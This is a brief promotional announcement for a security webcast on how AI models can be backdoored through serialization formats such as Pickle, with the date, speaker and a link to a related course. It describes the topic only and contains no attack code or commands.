Backdooring AI Models

  • Thursday, 20 Mar 2025 12:00PM EDT (20 Mar 2025 16:00 UTC)
  • Speaker: Ahmed Abugharbia

During this Webcast we will examines how AI models can be backdoored using vulnerabilities in serialization formats like Pickle. We will highlight the risks of untrusted models, demonstrate real-world techniques, and discuss strategies to secure AI pipelines against such attacks.

This webcast supports content and knowledge from SEC545: GenAI and LLM Application Security™. To learn more about this course, explore upcoming sessions, and access your FREE demo, click here.